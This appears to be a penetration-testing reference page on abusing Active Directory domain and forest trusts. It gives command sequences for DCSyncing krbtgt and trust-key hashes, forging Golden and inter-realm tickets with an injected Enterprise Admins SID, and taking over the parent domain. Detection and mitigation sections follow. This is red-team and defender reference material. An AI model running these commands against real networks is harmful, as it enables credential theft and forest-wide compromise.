Trust Attacks

Overview

Active Directory trusts define authentication relationships between domains and forests. When domains trust each other, users in one domain can access resources in the other. Compromising a child domain allows escalation to the parent domain (and the entire forest) using the trust key or krbtgt hash with SID History injection. Cross-forest trusts can also be abused if misconfigurations exist.

ATT&CK Mapping

  • Tactic: TA0007 - Discovery, TA0005 - Defense Evasion
  • Techniques:
  • T1482 - Domain Trust Discovery
  • T1134.005 - Access Token Manipulation: SID-History Injection

Prerequisites

  • Domain Admin in at least one domain (for intra-forest escalation)
  • Valid domain credentials (for enumeration)

Techniques

Enumerate Trusts

# NetExec
# https://github.com/Pennyw0rth/NetExec
nxc ldap <dc_ip> -u <user> -p <password> --bloodhound -c Trusts

# PowerShell
Get-ADTrust -Filter *
nltest /domain_trusts /all_trusts

# Trust details
Get-ADTrust -Identity "<trusted_domain>" | Select-Object *

# Impacket — enumerate trusts cross-domain
# https://github.com/fortra/impacket
impacket-findDelegation '<domain>/<user>:<password>' -target-domain <other_domain> -dc-ip <dc_ip>

Child-to-Parent Domain Escalation (SID History)

Within the same forest, child domain admins can forge a Golden Ticket with the Enterprise Admins SID from the parent domain injected via SID History.

Step 1 — Get trust key or child domain's krbtgt hash:

# Impacket — DCSync the krbtgt from child domain
# https://github.com/fortra/impacket
impacket-secretsdump '<child_domain>/<admin>:<password>@<child_dc>' -just-dc-user 'krbtgt'

# Or get the trust key (inter-realm trust account)
impacket-secretsdump '<child_domain>/<admin>:<password>@<child_dc>' -just-dc-user '<child_domain>$'

Step 2 — Get parent domain SID:

# Impacket
# https://github.com/fortra/impacket
impacket-lookupsid '<child_domain>/<admin>:<password>@<parent_dc>' 0

Step 3 — Forge Golden Ticket with extra SID:

# Impacket — golden ticket with Enterprise Admins SID (RID 519)
# https://github.com/fortra/impacket
impacket-ticketer -nthash <child_krbtgt_hash> -domain-sid <child_domain_sid> -domain <child_domain> -extra-sid <parent_domain_sid>-519 Administrator

# Mimikatz — golden ticket with extra SID
# https://github.com/gentilkiwi/mimikatz
mimikatz# kerberos::golden /user:Administrator /domain:<child_domain> /sid:<child_domain_sid> /krbtgt:<child_krbtgt_hash> /sids:<parent_domain_sid>-519 /ptt

Step 4 — Access parent domain:

export KRB5CCNAME=Administrator.ccache

# Impacket
# https://github.com/fortra/impacket
impacket-psexec '<child_domain>/Administrator@<parent_dc_hostname>' -k -no-pass
impacket-secretsdump '<child_domain>/Administrator@<parent_dc_hostname>' -k -no-pass

Inter-Realm Trust Ticket

Instead of forging a Golden Ticket, use the trust key directly to create an inter-realm TGT:

# Impacket — forge inter-realm ticket using trust key
# https://github.com/fortra/impacket
impacket-ticketer -nthash <trust_key_hash> -domain-sid <child_domain_sid> -domain <child_domain> -extra-sid <parent_domain_sid>-519 -spn 'krbtgt/<parent_domain>' Administrator

Cross-Forest Trust Abuse

Cross-forest trusts have SID Filtering enabled by default, which blocks SIDs with RID < 1000 (built-in privileged groups like Domain Admins, Enterprise Admins). Custom groups with RID >= 1000 pass through the filter. This limits but does not fully prevent cross-forest abuse. You can still:

  • Access resources explicitly shared across the trust
  • Enumerate the foreign forest
  • Exploit misconfigured permissions on shared resources
# Enumerate foreign domain through trust
# NetExec
# https://github.com/Pennyw0rth/NetExec
nxc smb <foreign_dc> -u '<child_domain>/<user>' -p '<password>' --shares

If SID Filtering is disabled (misconfiguration), cross-forest escalation works the same as child-to-parent.

Detection Methods

Network-Based Detection

  • Inter-realm Kerberos traffic with unexpected SID History values
  • TGT requests with extra SIDs from child domain DCs

Host-Based Detection

  • Windows Security Event 4769 with SID History populated
  • Golden Ticket indicators (no corresponding AS-REQ, unusual ticket lifetimes)
  • DCSync targeting the trust account (<domain>$)

Mitigation Strategies

  • SID Filtering — ensure SID Filtering is enabled on all trusts (default for external/forest trusts)
  • Selective Authentication — restrict which accounts can authenticate across trusts
  • Monitor trust changes — alert on new trust creation or trust attribute modifications
  • Limit trust scope — remove trusts that are no longer needed
  • Reset krbtgt — after child domain compromise, reset the child krbtgt twice

References

Official Documentation

MITRE ATT&CK